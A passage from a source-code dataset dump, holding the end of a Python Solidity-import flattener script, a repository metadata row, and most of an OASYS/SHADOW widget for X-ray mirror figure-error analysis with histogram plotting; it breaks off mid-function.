pragma_dict[pragma_experimental] = True
logging.info("Adding pragma: {pragma}".format(pragma=l))
else:
continue
if main is False:
pragma_match = re.search(pragma_regex, l)
if pragma_match is not None:
continue
import_match = re.findall(
r"^\s*import\s+|(?!{.*}\s*from\s*)[\"|\'](.*)[\"|\']\s*;\s*$", l
)
if len(import_match) == 2:
imported_file = import_match[1]
flat_source += flat_file(path=path, file=imported_file, level=level + 1)
flat_source += "\n"
continue
flat_source += l
return flat_source
def main():
class CliParser(argparse.ArgumentParser):
def error(self, message):
sys.stderr.write("Error: {}\n".format(message))
self.print_help()
sys.exit(2)
parser = CliParser()
parser.add_argument("--folder", help="Folder with contracts", default="./")
parser.add_argument("--contract", help="Main source Solidity file")
parser.add_argument(
"--output",
help="Output flattened Solidity file. Otherwise it appends `_flat.sol` to the contract filename.",
)
parser.add_argument(
"--verbose", "-v", action="count", default=0, help="Show details"
)
args = parser.parse_args()
contracts_dir = args.folder
main_sol = args.contract
output_sol = args.output
verbose = args.verbose
logging.getLogger().setLevel(logging.INFO)
if verbose >= 1:
logging.getLogger().setLevel(logging.DEBUG)
source = flat_file(path=contracts_dir, file=main_sol, level=0)
if not output_sol:
output_sol = main_sol.split(".")
output_sol.pop()
output_sol[-1] += "_flat"
output_sol.append("sol")
output_sol = ".".join(output_sol)
logging.info("Writing flattened file {file}".format(file=output_sol))
with open(output_sol, "w") as f:
f.write(source)
if __name__ == "__main__":
main()
| true | true |
1c3c88770fdcab653e777c79aeedf0ce84d5c4a1 | 43,226 | py | Python | orangecontrib/aps/shadow/widgets/_not_used/hybrid_screen_error_analysis.py | oasys-aps-kit/OASYS1-APS-ShadowOui | c8f1f5490baf9903d68c4830a770ed4a455a35b7 | [
"Unlicense"
] | 1 | 2019-08-22T01:04:39.000Z | 2019-08-22T01:04:39.000Z | orangecontrib/aps/shadow/widgets/_not_used/hybrid_screen_error_analysis.py | oasys-aps-kit/OASYS1-APS-Extensions | c8f1f5490baf9903d68c4830a770ed4a455a35b7 | [
"Unlicense"
] | null | null | null | orangecontrib/aps/shadow/widgets/_not_used/hybrid_screen_error_analysis.py | oasys-aps-kit/OASYS1-APS-Extensions | c8f1f5490baf9903d68c4830a770ed4a455a35b7 | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# #########################################################################
# Copyright (c) 2018, UChicago Argonne, LLC. All rights reserved. #
# #
# Copyright 2018. UChicago Argonne, LLC. This software was produced #
# under U.S. Government contract DE-AC02-06CH11357 for Argonne National #
# Laboratory (ANL), which is operated by UChicago Argonne, LLC for the #
# U.S. Department of Energy. The U.S. Government has rights to use, #
# reproduce, and distribute this software. NEITHER THE GOVERNMENT NOR #
# UChicago Argonne, LLC MAKES ANY WARRANTY, EXPRESS OR IMPLIED, OR #
# ASSUMES ANY LIABILITY FOR THE USE OF THIS SOFTWARE. If software is #
# modified to produce derivative works, such modified software should #
# be clearly marked, so as not to confuse it with the version available #
# from ANL. #
# #
# Additionally, redistribution and use in source and binary forms, with #
# or without modification, are permitted provided that the following #
# conditions are met: #
# #
# * Redistributions of source code must retain the above copyright #
# notice, this list of conditions and the following disclaimer. #
# #
# * Redistributions in binary form must reproduce the above copyright #
# notice, this list of conditions and the following disclaimer in #
# the documentation and/or other materials provided with the #
# distribution. #
# #
# * Neither the name of UChicago Argonne, LLC, Argonne National #
# Laboratory, ANL, the U.S. Government, nor the names of its #
# contributors may be used to endorse or promote products derived #
# from this software without specific prior written permission. #
# #
# THIS SOFTWARE IS PROVIDED BY UChicago Argonne, LLC AND CONTRIBUTORS #
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT #
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS #
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL UChicago #
# Argonne, LLC OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, #
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, #
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; #
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER #
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT #
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN #
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE #
# POSSIBILITY OF SUCH DAMAGE. #
# #########################################################################
__author__ = 'labx'
import os, sys
import orangecanvas.resources as resources
from oasys.widgets import gui as oasysgui
from oasys.widgets import congruence
from orangewidget import gui, widget
from orangewidget.settings import Setting
from oasys.util.oasys_util import EmittingStream
from orangecontrib.shadow.util.shadow_util import ShadowCongruence
from orangecontrib.shadow.util.shadow_objects import ShadowBeam
from PyQt5.QtGui import QImage, QPixmap, QPalette, QFont, QColor, QTextCursor
from PyQt5.QtWidgets import QLabel, QWidget, QHBoxLayout, QMessageBox, QFileDialog
from orangecontrib.shadow.widgets.gui.ow_automatic_element import AutomaticElement
from orangecontrib.shadow.widgets.special_elements import hybrid_control
from orangecontrib.shadow.util.shadow_objects import ShadowPreProcessorData
from orangecontrib.aps.util.gui import HistogramData, StatisticalDataCollection, HistogramDataCollection, \
DoublePlotWidget, write_histo_and_stats_file
from orangecontrib.aps.shadow.util.gui import Scan3DHistoWidget, ScanHistoWidget
class HybridScreenErrorAnalysis(AutomaticElement):
inputs = [("Input Beam", ShadowBeam, "setBeam"),
("PreProcessor Data", ShadowPreProcessorData, "setPreProcessorData")]
name = "Hybrid Screen - Error Analysis"
description = "Shadow HYBRID: Hybrid Screen - Error Analysis"
icon = "icons/hybrid_screen.png"
maintainer = "Luca Rebuffi and Xianbo Shi"
maintainer_email = "lrebuffi(@at@)anl.gov, xshi(@at@)aps.anl.gov"
priority = 2
category = "HYBRID"
keywords = ["data", "file", "load", "read"]
want_control_area = 1
want_main_area = 1
ghy_diff_plane = Setting(1)
ghy_calcType = Setting(0)
focal_length_calc = Setting(0)
ghy_focallength = Setting(0.0)
distance_to_image_calc = Setting(0)
ghy_distance = Setting(0.0)
ghy_nf = Setting(0)
ghy_nbins_x = Setting(100)
ghy_nbins_z = Setting(100)
ghy_npeak = Setting(10)
ghy_fftnpts = Setting(1e6)
file_to_write_out = 0
ghy_automatic = Setting(1)
files_area = None
ghy_files = Setting([""])
input_beam = None
TABS_AREA_HEIGHT = 560
CONTROL_AREA_WIDTH = 405
IMAGE_WIDTH = 865
IMAGE_HEIGHT = 605
current_histo_data_x_ff = None
current_histo_data_x_nf = None
current_histo_data_z_ff = None
current_histo_data_z_nf = None
current_stats_x_ff = None
current_stats_x_nf = None
current_stats_z_ff = None
current_stats_z_nf = None
plot_type = Setting(1)
plot_type_3D = Setting(0)
colormap = Setting(0)
def __init__(self):
super().__init__()
self.runaction = widget.OWAction("Run Hybrid", self)
self.runaction.triggered.connect(self.run_hybrid)
self.addAction(self.runaction)
self.controlArea.setFixedWidth(self.CONTROL_AREA_WIDTH)
button_box = oasysgui.widgetBox(self.controlArea, "", addSpace=False, orientation="horizontal")
button = gui.button(button_box, self, "Run HYBRID", callback=self.run_hybrid)
font = QFont(button.font())
font.setBold(True)
button.setFont(font)
palette = QPalette(button.palette()) # make a copy of the palette
palette.setColor(QPalette.ButtonText, QColor('Dark Blue'))
button.setPalette(palette) # assign new palette
button.setFixedHeight(45)
main_tabs = oasysgui.tabWidget(self.mainArea)
plot_tab = oasysgui.createTabPage(main_tabs, "Plots")
out_tab = oasysgui.createTabPage(main_tabs, "Output")
self.tabs = oasysgui.tabWidget(plot_tab)
tabs_setting = oasysgui.tabWidget(self.controlArea)
tabs_setting.setFixedHeight(self.TABS_AREA_HEIGHT)
tabs_setting.setFixedWidth(self.CONTROL_AREA_WIDTH-5)
tab_bas = oasysgui.createTabPage(tabs_setting, "Basic Setting")
tab_adv = oasysgui.createTabPage(tabs_setting, "Advanced Setting")
box_1 = oasysgui.widgetBox(tab_bas, "Calculation Parameters", addSpace=True, orientation="vertical", height=100)
gui.comboBox(box_1, self, "ghy_diff_plane", label="Diffraction Plane", labelWidth=310,
items=["Sagittal", "Tangential", "Both (2D)", "Both (1D+1D)"],
callback=self.set_DiffPlane,
sendSelectedValue=False, orientation="horizontal")
gui.comboBox(box_1, self, "ghy_calcType", label="Calculation", labelWidth=70,
items=["Diffraction by Mirror Size + Figure Errors",
"Diffraction by Grating Size + Figure Errors",],
callback=self.set_CalculationType,
sendSelectedValue=False, orientation="horizontal")
gui.separator(box_1, 10)
box_files = oasysgui.widgetBox(tab_bas, "Height Error Profiles", addSpace=True, orientation="vertical", height=180)
gui.button(box_files, self, "Select Height Error Profile Data Files", callback=self.select_files)
self.files_area = oasysgui.textArea(height=120, width=360)
self.refresh_files_text_area()
box_files.layout().addWidget(self.files_area)
box_2 = oasysgui.widgetBox(tab_bas, "Numerical Control Parameters", addSpace=True, orientation="vertical", height=140)
self.le_nbins_x = oasysgui.lineEdit(box_2, self, "ghy_nbins_x", "Number of bins for I(Sagittal) histogram", labelWidth=260, valueType=int, orientation="horizontal")
self.le_nbins_z = oasysgui.lineEdit(box_2, self, "ghy_nbins_z", "Number of bins for I(Tangential) histogram", labelWidth=260, valueType=int, orientation="horizontal")
self.le_npeak = oasysgui.lineEdit(box_2, self, "ghy_npeak", "Number of diffraction peaks", labelWidth=260, valueType=int, orientation="horizontal")
self.le_fftnpts = oasysgui.lineEdit(box_2, self, "ghy_fftnpts", "Number of points for FFT", labelWidth=260, valueType=int, orientation="horizontal")
box_3 = oasysgui.widgetBox(tab_adv, "Propagation Parameters", addSpace=True, orientation="vertical", height=200)
self.cb_focal_length_calc = gui.comboBox(box_3, self, "focal_length_calc", label="Focal Length", labelWidth=180,
items=["Use O.E. Focal Distance", "Specify Value"],
callback=self.set_FocalLengthCalc,
sendSelectedValue=False, orientation="horizontal")
self.le_focal_length = oasysgui.lineEdit(box_3, self, "ghy_focallength", "Focal Length value", labelWidth=260, valueType=float, orientation="horizontal")
gui.separator(box_3)
self.cb_distance_to_image_calc = gui.comboBox(box_3, self, "distance_to_image_calc", label="Distance to image", labelWidth=150,
items=["Use O.E. Image Plane Distance", "Specify Value"],
callback=self.set_DistanceToImageCalc,
sendSelectedValue=False, orientation="horizontal")
self.le_distance_to_image = oasysgui.lineEdit(box_3, self, "ghy_distance", "Distance to Image value", labelWidth=260, valueType=float, orientation="horizontal")
gui.separator(box_3)
self.cb_nf = gui.comboBox(box_3, self, "ghy_nf", label="Near Field Calculation", labelWidth=310,
items=["No", "Yes"],
sendSelectedValue=False, orientation="horizontal", callback=self.set_NF)
box_4 = oasysgui.widgetBox(tab_adv, "Geometrical Parameters", addSpace=True, orientation="vertical", height=70)
gui.comboBox(box_4, self, "ghy_automatic", label="Analize geometry to avoid unuseful calculations", labelWidth=310,
items=["No", "Yes"],
sendSelectedValue=False, orientation="horizontal")
box_5 = oasysgui.widgetBox(tab_adv, "Plot Setting", addSpace=True, orientation="vertical", height=150)
gui.comboBox(box_5, self, "plot_type", label="Plot Type", labelWidth=310,
items=["2D", "3D"],
sendSelectedValue=False, orientation="horizontal", callback=self.set_PlotType)
self.box_pt_1 = oasysgui.widgetBox(box_5, "", addSpace=False, orientation="vertical", height=30)
self.box_pt_2 = oasysgui.widgetBox(box_5, "", addSpace=False, orientation="vertical", height=30)
gui.comboBox(self.box_pt_2, self, "plot_type_3D", label="3D Plot Aspect", labelWidth=310,
items=["Lines", "Surface"],
sendSelectedValue=False, orientation="horizontal")
self.set_DiffPlane()
self.set_DistanceToImageCalc()
self.set_CalculationType()
self.set_NF()
self.set_PlotType()
self.initializeTabs()
adv_other_box = oasysgui.widgetBox(tab_bas, "Export Data", addSpace=False, orientation="vertical")
gui.button(adv_other_box, self, "Export Error Analysis", callback=self.export_error_analysis)
self.shadow_output = oasysgui.textArea(height=580, width=800)
out_box = gui.widgetBox(out_tab, "System Output", addSpace=True, orientation="horizontal")
out_box.layout().addWidget(self.shadow_output)
def after_change_workspace_units(self):
label = self.le_focal_length.parent().layout().itemAt(0).widget()
label.setText(label.text() + " [" + self.workspace_units_label + "]")
label = self.le_distance_to_image.parent().layout().itemAt(0).widget()
label.setText(label.text() + " [" + self.workspace_units_label + "]")
def select_files(self):
files, _ = QFileDialog.getOpenFileNames(self,
"Select Height Error Profiles", "","Data Files (*.dat);;Sha Files (*.sha)",
options=QFileDialog.Options())
if files:
self.ghy_files = files
self.refresh_files_text_area()
def initializeTabs(self):
self.tabs.clear()
tabs = []
if self.ghy_diff_plane < 2:
tabs.append(oasysgui.tabWidget(gui.createTabPage(self.tabs, "Distribution of Position at Image Plane")))
self.tab = [[gui.createTabPage(tabs[0], "Position"), gui.createTabPage(tabs[0], "Stats")]]
if self.ghy_nf == 1:
tabs.append(oasysgui.tabWidget(gui.createTabPage(self.tabs, "Distribution of Position at Near Field")))
self.tab.append([gui.createTabPage(tabs[1], "Position"), gui.createTabPage(tabs[1], "Stats")])
elif self.ghy_diff_plane >= 2:
if self.ghy_nf == 1:
tabs.append(oasysgui.tabWidget(gui.createTabPage(self.tabs, "Distribution of Position at Image Plane (S)")))
tabs.append(oasysgui.tabWidget(gui.createTabPage(self.tabs, "Distribution of Position at Near Field (S)")))
tabs.append(oasysgui.tabWidget(gui.createTabPage(self.tabs, "Distribution of Position at Image Plane (T)")))
tabs.append(oasysgui.tabWidget(gui.createTabPage(self.tabs, "Distribution of Position at Near Field (T)")))
self.tab = [[gui.createTabPage(tabs[0], "Position"), gui.createTabPage(tabs[0], "Stats")],
[gui.createTabPage(tabs[1], "Position"), gui.createTabPage(tabs[1], "Stats")],
[gui.createTabPage(tabs[2], "Position"), gui.createTabPage(tabs[2], "Stats")],
[gui.createTabPage(tabs[3], "Position"), gui.createTabPage(tabs[3], "Stats")]
]
else:
tabs.append(oasysgui.tabWidget(gui.createTabPage(self.tabs, "Distribution of Position at Image Plane (S)")))
tabs.append(oasysgui.tabWidget(gui.createTabPage(self.tabs, "Distribution of Position at Image Plane (T)")))
self.tab = [[gui.createTabPage(tabs[0], "Position"), gui.createTabPage(tabs[0], "Stats")],
[gui.createTabPage(tabs[1], "Position"), gui.createTabPage(tabs[1], "Stats")]
]
for tab in tabs:
tab.setFixedHeight(self.IMAGE_HEIGHT)
tab.setFixedWidth(self.IMAGE_WIDTH)
self.plot_canvas = [None, None, None, None]
self.plot_canvas_stats = [None, None, None, None]
def plot_emtpy(self, progressBarValue, plot_canvas_index):
if self.plot_canvas[plot_canvas_index] is None:
widget = QWidget()
widget.setLayout(QHBoxLayout())
label = QLabel(widget)
label.setPixmap(QPixmap(QImage(os.path.join(resources.package_dirname("orangecontrib.shadow.widgets.extension"), "icons", "no_result.png"))))
widget.layout().addWidget(label)
self.plot_canvas[plot_canvas_index] = widget
self.tab[plot_canvas_index].layout().addWidget(self.plot_canvas[plot_canvas_index])
self.progressBarSet(progressBarValue)
def setBeam(self, beam):
if ShadowCongruence.checkEmptyBeam(beam):
if ShadowCongruence.checkGoodBeam(beam):
self.input_beam = beam
if self.is_automatic_run:
self.run_hybrid()
def set_PlotType(self):
self.plot_canvas = [None, None, None, None]
self.box_pt_1.setVisible(self.plot_type==0)
self.box_pt_2.setVisible(self.plot_type==1)
def set_DiffPlane(self):
self.le_nbins_x.setEnabled(self.ghy_diff_plane == 0 or self.ghy_diff_plane == 2)
self.le_nbins_z.setEnabled(self.ghy_diff_plane == 1 or self.ghy_diff_plane == 2)
if self.ghy_diff_plane != 2:
self.cb_nf.setEnabled(True)
else:
self.cb_nf.setEnabled(False)
self.ghy_nf = 0
self.set_NF()
def set_CalculationType(self):
if self.ghy_diff_plane != 2:
self.cb_nf.setEnabled(True)
else:
self.cb_nf.setEnabled(False)
self.ghy_nf = 0
self.set_NF()
def set_NF(self):
if self.ghy_nf == 0:
self.focal_length_calc = 0
self.distance_to_image_calc = 0
self.cb_focal_length_calc.setEnabled(False)
self.le_focal_length.setEnabled(False)
else:
self.cb_focal_length_calc.setEnabled(True)
self.le_focal_length.setEnabled(True)
self.set_FocalLengthCalc()
def set_FocalLengthCalc(self):
self.le_focal_length.setEnabled(self.focal_length_calc == 1)
def set_DistanceToImageCalc(self):
self.le_distance_to_image.setEnabled(self.distance_to_image_calc == 1)
def run_hybrid(self):
try:
self.setStatusMessage("")
self.progressBarInit()
self.initializeTabs()
if ShadowCongruence.checkEmptyBeam(self.input_beam):
if ShadowCongruence.checkGoodBeam(self.input_beam):
sys.stdout = EmittingStream(textWritten=self.write_stdout)
self.check_fields()
input_parameters = hybrid_control.HybridInputParameters()
input_parameters.ghy_lengthunit = self.workspace_units
input_parameters.widget = self
input_parameters.ghy_diff_plane = self.ghy_diff_plane + 1
if self.distance_to_image_calc == 0:
input_parameters.ghy_distance = -1
else:
input_parameters.ghy_distance = self.ghy_distance
if self.focal_length_calc == 0:
input_parameters.ghy_focallength = -1
else:
input_parameters.ghy_focallength = self.ghy_focallength
input_parameters.ghy_nf = self.ghy_nf
input_parameters.ghy_nbins_x = int(self.ghy_nbins_x)
input_parameters.ghy_nbins_z = int(self.ghy_nbins_z)
input_parameters.ghy_npeak = int(self.ghy_npeak)
input_parameters.ghy_fftnpts = int(self.ghy_fftnpts)
input_parameters.file_to_write_out = self.file_to_write_out
input_parameters.ghy_automatic = self.ghy_automatic
# -----------------------------------------------
#cycling or figure errors
# add the reference (no error profile)
shadow_beam = self.input_beam.duplicate()
history_entry = shadow_beam.getOEHistory(shadow_beam._oe_number)
shadow_oe = history_entry._shadow_oe_start # changes to the original object!
shadow_oe._oe.F_RIPPLE = 0
input_parameters.ghy_calcType = 2
input_parameters.shadow_beam = shadow_beam
calculation_parameters = hybrid_control.hy_run(input_parameters)
self.ghy_focallength = input_parameters.ghy_focallength
self.ghy_distance = input_parameters.ghy_distance
self.ghy_nbins_x = int(input_parameters.ghy_nbins_x)
self.ghy_nbins_z = int(input_parameters.ghy_nbins_z)
self.ghy_npeak = int(input_parameters.ghy_npeak)
self.ghy_fftnpts = int(input_parameters.ghy_fftnpts)
if input_parameters.ghy_calcType == 3 or input_parameters.ghy_calcType == 4:
do_plot_x = True
do_plot_z = True
else:
if self.ghy_automatic == 1:
do_plot_x = not calculation_parameters.beam_not_cut_in_x
do_plot_z = not calculation_parameters.beam_not_cut_in_z
else:
do_plot_x = True
do_plot_z = True
do_nf = input_parameters.ghy_nf == 1 and input_parameters.ghy_calcType > 1
if do_plot_x or do_plot_z:
self.setStatusMessage("Plotting Results")
profile = 0
self.current_histo_data_x_ff = None
self.current_histo_data_x_nf = None
self.current_histo_data_z_ff = None
self.current_histo_data_z_nf = None
self.current_stats_x_ff = None
self.current_stats_x_nf = None
self.current_stats_z_ff = None
self.current_stats_z_nf = None
histo_data_x_ff, \
histo_data_z_ff, \
histo_data_x_nf, \
histo_data_z_nf = self.plot_results(calculation_parameters=calculation_parameters,
do_nf=do_nf,
do_plot_x=do_plot_x,
do_plot_z=do_plot_z,
histo_data_x_ff=HistogramData(),
histo_data_z_ff=HistogramData(),
histo_data_x_nf=HistogramData(),
histo_data_z_nf=HistogramData(),
profile=profile)
if not histo_data_x_ff.bins is None: self.current_histo_data_x_ff = HistogramDataCollection(histo_data_x_ff)
if not histo_data_z_ff.bins is None: self.current_histo_data_z_ff = HistogramDataCollection(histo_data_z_ff)
if not histo_data_x_nf.bins is None: self.current_histo_data_x_nf = HistogramDataCollection(histo_data_x_nf)
if not histo_data_z_nf.bins is None: self.current_histo_data_z_nf = HistogramDataCollection(histo_data_z_nf)
stats_x_ff = StatisticalDataCollection(histo_data_x_ff)
stats_z_ff = StatisticalDataCollection(histo_data_z_ff)
stats_x_nf = StatisticalDataCollection(histo_data_x_nf)
stats_z_nf = StatisticalDataCollection(histo_data_z_nf)
input_parameters.ghy_calcType = self.ghy_calcType + 3
for file in self.ghy_files:
shadow_beam = self.input_beam.duplicate()
history_entry = shadow_beam.getOEHistory(shadow_beam._oe_number)
shadow_oe = history_entry._shadow_oe_start # changes to the original object!
shadow_oe._oe.F_RIPPLE = 1
shadow_oe._oe.F_G_S = 2
file = congruence.checkFile(file)
ShadowCongruence.checkErrorProfileFile(file)
shadow_oe._oe.FILE_RIP = bytes(file, 'utf-8')
input_parameters.shadow_beam = shadow_beam
calculation_parameters = hybrid_control.hy_run(input_parameters)
if do_plot_x or do_plot_z:
self.setStatusMessage("Plotting Results")
profile += 1
histo_data_x_ff, \
histo_data_z_ff, \
histo_data_x_nf, \
histo_data_z_nf = self.plot_results(calculation_parameters,
do_nf,
do_plot_x,
do_plot_z,
histo_data_x_ff,
histo_data_z_ff,
histo_data_x_nf,
histo_data_z_nf,
profile)
if not histo_data_x_ff.bins is None: self.current_histo_data_x_ff.add_histogram_data(histo_data_x_ff)
if not histo_data_z_ff.bins is None: self.current_histo_data_z_ff.add_histogram_data(histo_data_z_ff)
if not histo_data_x_nf.bins is None: self.current_histo_data_x_nf.add_histogram_data(histo_data_x_nf)
if not histo_data_z_nf.bins is None: self.current_histo_data_z_nf.add_histogram_data(histo_data_z_nf)
stats_x_ff.add_statistical_data(histo_data_x_ff)
stats_z_ff.add_statistical_data(histo_data_z_ff)
stats_x_nf.add_statistical_data(histo_data_x_nf)
stats_z_nf.add_statistical_data(histo_data_z_nf)
self.current_stats_x_ff = stats_x_ff
self.current_stats_z_ff = stats_z_ff
self.current_stats_x_nf = stats_x_nf
self.current_stats_z_nf = stats_z_nf
self.add_empty_curves(do_nf,
do_plot_x,
do_plot_z,
histo_data_x_ff,
histo_data_x_nf,
histo_data_z_ff,
histo_data_z_nf)
self.plot_stats(do_nf,
do_plot_x,
do_plot_z,
stats_x_ff,
stats_z_ff,
stats_x_nf,
stats_z_nf,)
else:
raise Exception("Input Beam with no good rays")
else:
raise Exception("Empty Input Beam")
except Exception as exception:
QMessageBox.critical(self, "Error", str(exception), QMessageBox.Ok)
if self.IS_DEVELOP: raise exception
self.setStatusMessage("")
self.progressBarFinished()
def plot_results(self,
calculation_parameters,
do_nf,
do_plot_x,
do_plot_z,
histo_data_x_ff,
histo_data_z_ff,
histo_data_x_nf,
histo_data_z_nf,
profile):
if self.ghy_diff_plane == 0:
if do_plot_x:
histo_data_x_ff = self.plot_histo(calculation_parameters.ff_beam, 1, progressBarValue=88,
plot_canvas_index=0, title="X",
xtitle=r'X [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_x_ff.offset, xrange=histo_data_x_ff.xrange)
if do_nf:
histo_data_x_nf = self.plot_histo(calculation_parameters.nf_beam, 1, progressBarValue=96,
plot_canvas_index=1, title="X",
xtitle=r'X [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_x_nf.offset, xrange=histo_data_x_nf.xrange)
else:
if do_nf:
self.plot_emtpy(88, 0)
self.plot_emtpy(96, 1)
else:
self.plot_emtpy(88, 0)
elif self.ghy_diff_plane == 1:
if do_plot_z:
histo_data_z_ff = self.plot_histo(calculation_parameters.ff_beam, 3, progressBarValue=88,
plot_canvas_index=0, title="Z",
xtitle=r'Z [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_z_ff.offset, xrange=histo_data_z_ff.xrange)
if do_nf:
histo_data_z_nf = self.plot_histo(calculation_parameters.nf_beam, 3, progressBarValue=96,
plot_canvas_index=1, title="Z",
xtitle=r'Z [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_z_nf.offset, xrange=histo_data_z_nf.xrange)
else:
self.plot_emtpy(88, 0)
if do_nf:
self.plot_emtpy(96, 1)
elif self.ghy_diff_plane >= 2:
if do_plot_x and do_plot_z:
histo_data_x_ff = self.plot_histo(calculation_parameters.ff_beam, 1, progressBarValue=88,
plot_canvas_index=0, title="X",
xtitle=r'X [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_x_ff.offset, xrange=histo_data_x_ff.xrange)
histo_data_z_ff = self.plot_histo(calculation_parameters.ff_beam, 3, progressBarValue=88,
plot_canvas_index=1, title="Z",
xtitle=r'Z [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_z_ff.offset, xrange=histo_data_z_ff.xrange)
if do_nf:
histo_data_x_nf = self.plot_histo(calculation_parameters.nf_beam, 1, progressBarValue=96,
plot_canvas_index=2, title="X",
xtitle=r'X [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_x_nf.offset, xrange=histo_data_x_nf.xrange)
histo_data_z_nf = self.plot_histo(calculation_parameters.nf_beam, 3, progressBarValue=96,
plot_canvas_index=3, title="Z",
xtitle=r'Z [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_z_nf.offset, xrange=histo_data_z_nf.xrange)
else:
if do_plot_x:
histo_data_x_ff = self.plot_histo(calculation_parameters.ff_beam, 1, progressBarValue=88,
plot_canvas_index=0, title="X",
xtitle=r'X [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_x_ff.offset, xrange=histo_data_x_ff.xrange)
if do_nf:
histo_data_x_nf = self.plot_histo(calculation_parameters.nf_beam, 1, progressBarValue=96,
plot_canvas_index=1, title="X",
xtitle=r'X [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_x_nf.offset, xrange=histo_data_x_nf.xrange)
elif do_plot_z:
histo_data_z_ff = self.plot_histo(calculation_parameters.ff_beam, 3, progressBarValue=88,
plot_canvas_index=0, title="Z",
xtitle=r'Z [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_z_ff.offset, xrange=histo_data_z_ff.xrange)
if do_nf:
histo_data_z_nf = self.plot_histo(calculation_parameters.nf_beam, 3, progressBarValue=96,
plot_canvas_index=1, title="Z",
xtitle=r'Z [$\mu$m]', ytitle=r'Number of Rays', profile=profile,
offset=histo_data_z_nf.offset, xrange=histo_data_z_nf.xrange)
else:
self.plot_emtpy(88, 0)
if do_nf:
self.plot_emtpy(96, 1)
return histo_data_x_ff, histo_data_z_ff, histo_data_x_nf, histo_data_z_nf
def add_empty_curves(self, do_nf, do_plot_x, do_plot_z, histo_data_x_ff, histo_data_x_nf, histo_data_z_ff,
histo_data_z_nf):
if self.ghy_diff_plane == 0:
if do_plot_x:
self.plot_canvas_stats[0].add_empty_curve(histo_data_x_ff)
if do_nf:
self.plot_canvas[1].add_empty_curve(histo_data_x_nf)
elif self.ghy_diff_plane == 1:
if do_plot_z:
self.plot_canvas[0].add_empty_curve(histo_data_z_ff)
if do_nf:
self.plot_canvas[1].add_empty_curve(histo_data_z_nf)
else:
if do_plot_x and do_plot_z:
self.plot_canvas[0].add_empty_curve(histo_data_x_ff)
self.plot_canvas[1].add_empty_curve(histo_data_z_ff)
if do_nf:
self.plot_canvas[2].add_empty_curve(histo_data_x_nf)
self.plot_canvas[3].add_empty_curve(histo_data_z_nf)
else:
if do_plot_x:
self.plot_canvas[0].add_empty_curve(histo_data_x_ff)
if do_nf:
self.plot_canvas[1].add_empty_curve(histo_data_x_nf)
elif do_plot_z:
self.plot_canvas[0].add_empty_curve(histo_data_z_ff)
if do_nf:
self.plot_canvas[1].add_empty_curve(histo_data_z_nf)
def plot_stats(self, do_nf, do_plot_x, do_plot_z, stats_x_ff, stats_z_ff, stats_x_nf, stats_z_nf):
if self.ghy_diff_plane == 0:
if do_plot_x:
self.plot_stat(stats_x_ff, 0)
if do_nf:
self.plot_stat(stats_x_nf, 1)
elif self.ghy_diff_plane == 1:
if do_plot_z:
self.plot_stat(stats_z_ff, 0)
if do_nf:
self.plot_stat(stats_z_nf, 1)
else:
if do_plot_x and do_plot_z:
self.plot_stat(stats_x_ff, 0)
self.plot_stat(stats_z_ff, 1)
if do_nf:
self.plot_stat(stats_x_nf, 2)
self.plot_stat(stats_z_nf, 3)
else:
if do_plot_x:
self.plot_stat(stats_x_ff, 0)
if do_nf:
self.plot_stat(stats_x_nf, 1)
elif do_plot_z:
self.plot_stat(stats_z_ff, 0)
if do_nf:
self.plot_stat(stats_z_nf, 1)
def plot_stat(self, stats, plot_canvas_index, sigma_um="$\mu$m"):
if self.plot_canvas_stats[plot_canvas_index] is None:
self.plot_canvas_stats[plot_canvas_index] = DoublePlotWidget(parent=None)
self.tab[plot_canvas_index][1].layout().addWidget(self.plot_canvas_stats[plot_canvas_index])
self.plot_canvas_stats[plot_canvas_index].plotCurves(stats.get_scan_values(),
stats.get_sigmas(),
stats.get_relative_peak_intensities(),
"Statistics",
"Profiles",
"Sigma [" + sigma_um + "]",
"Relative Peak Intensity")
def plot_histo(self, beam, col, nbins=100, progressBarValue=80, plot_canvas_index=0, title="", xtitle="", ytitle="",
profile=1, offset=0.0, xrange=None):
if self.plot_canvas[plot_canvas_index] is None:
if self.plot_type == 0:
self.plot_canvas[plot_canvas_index] = ScanHistoWidget(self.workspace_units_to_cm)
elif self.plot_type==1:
self.plot_canvas[plot_canvas_index] = Scan3DHistoWidget(self.workspace_units_to_cm,
type=Scan3DHistoWidget.PlotType.LINES if self.plot_type_3D==0 else Scan3DHistoWidget.PlotType.SURFACE)
self.tab[plot_canvas_index][0].layout().addWidget(self.plot_canvas[plot_canvas_index])
histo_data = self.plot_canvas[plot_canvas_index].plot_histo(beam=beam,
col=col,
nbins=nbins,
title=title,
xtitle=xtitle,
ytitle=ytitle,
histo_index=profile,
scan_variable_name="Profile #",
scan_variable_value=profile,
offset=offset,
xrange=xrange)
histo_data.scan_value=profile
self.progressBarSet(progressBarValue)
return histo_data
def check_fields(self):
if self.focal_length_calc == 1:
congruence.checkPositiveNumber(self.ghy_focallength, "Focal Length value")
if self.distance_to_image_calc == 1:
